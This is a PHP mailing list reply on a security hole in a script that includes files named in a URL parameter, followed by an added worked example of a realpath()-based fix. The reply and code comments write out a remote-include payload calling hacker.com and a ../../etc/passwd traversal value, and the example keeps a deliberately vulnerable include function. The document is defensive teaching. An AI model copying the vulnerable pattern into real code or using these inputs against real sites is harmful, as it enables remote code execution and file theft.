Use realpath() to check the path. I also suspect your script is vulnerable to cross-site includes (include('http://hacker.com/script.inc');)
Rick Beckman wrote:
> Okay, I was mistaken... There is a gaping security hole in my simple li'l
> script... How do I modify it to only accept files from a certain path? I
> want the url format to be script.php?call=1 where "1" is the called file in
> the /includes/ directory. Just when I get optimistic I leave the entire
> system exposed. Yeah, that fits with my luck. :-)
>
>

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
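To make the realpath() advice above concrete, here is an added example (not Rick's script and not from the list reply) showing the include-what-the-user-sent pattern the thread is about next to a version that canonicalises the path and refuses anything that resolves outside the allowed directory. It assumes PHP 7.1 or later, that the includable files live in an includes/ directory next to the script and are named like 1.inc; the function names are made up for the example.

```php
<?php
// Added example, not the original poster's code. Assumes PHP 7.1+ and that
// includable files live in ./includes/ as <name>.inc (both are assumptions).

// The vulnerable shape discussed in the thread: the query value goes straight
// into include(). ?call=../../etc/passwd reads arbitrary local files, and with
// allow_url_fopen (and, from PHP 5.2, allow_url_include) enabled,
// ?call=http://hacker.com/script.inc runs attacker-supplied code.
function include_unsafe(string $call): void
{
    include($call);
}

/**
 * Map a user-supplied "call" value onto a file that must live inside $baseDir.
 * Returns the canonical absolute path, or null when the request is rejected.
 */
function resolve_include(string $call, string $baseDir): ?string
{
    // Canonicalise the allowed directory once. realpath() returns false when
    // the path does not exist, so fail closed rather than compare against "".
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $base = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;

    // Prepend the base directory and canonicalise the result. realpath()
    // collapses "..", resolves symlinks and returns false for files that do
    // not exist. Because the base directory is prepended, a value such as
    // "http://hacker.com/script.inc" becomes a non-existent local path and is
    // rejected the same way; stream wrappers never come into play.
    $candidate = realpath($base . $call . '.inc');
    if ($candidate === false) {
        return null;
    }

    // After canonicalisation the file must still sit under the base directory.
    // Any "../" traversal would have moved it elsewhere and fails this check.
    if (strncmp($candidate, $base, strlen($base)) !== 0) {
        return null;
    }
    return $candidate;
}

// Usage matching the script.php?call=1 URL format from the question.
$call = (string)($_GET['call'] ?? '');
$file = resolve_include($call, __DIR__ . '/includes');
if ($file === null) {
    http_response_code(404);
    exit('No such page');
}
include $file;
```

Two caveats worth knowing: realpath() only answers for files that exist, so the "false means reject" branch is essential, and the prefix comparison must be done on the canonical form of both sides, not on the raw query string. Since the question only ever expects values like "1", an even simpler defence is to refuse anything that fails ctype_digit() before touching the filesystem; the realpath() check then becomes a second layer rather than the only one.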